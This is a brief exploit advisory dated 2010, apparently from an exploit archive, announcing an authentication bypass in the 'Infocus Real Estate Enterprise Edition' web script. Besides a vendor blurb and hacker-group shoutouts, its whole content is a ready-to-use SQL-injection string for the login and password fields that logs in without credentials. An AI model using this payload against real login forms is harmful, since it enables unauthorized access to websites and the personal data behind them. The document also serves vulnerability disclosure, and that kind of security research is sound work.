id: 12008
date: 04/27/2010
title: Infocus Real Estate Enterprise Edition Script Authentication Bypass
author: Sid3^effects
cves: 

===================================================================
Infocus Real Estate Enterprise Edition Script Authentication Bypass
===================================================================

Authentication bypass in Infocus Real Estate Enterprise Edition script
                                   Vendor:www.instantrankingseo.com _______________________Author:Sid3^effects aKa haRi____________________________
  
 
Description :
 
Infocus Real Estate Enterprise Edition, is a complete power packed script with tons of powerful features. You can now have your own Real Estate Script similar to 99acres.com, makaan.com or magicbricks.com. The script is very handy and completely customizable. Below are some of the outstanding features of this script.
 
 
---------------------------------------------------------------------------
    * Authentication bypass:
 
    The following script has authentication bypass.
 
    use ' or 1=1 or ''=' in both login and password.
 
 
 
ShoutZ :
-------
               ---Indian Cyber warriors--Andhra hackers-- 



#  0day.today [2023-03-22]  #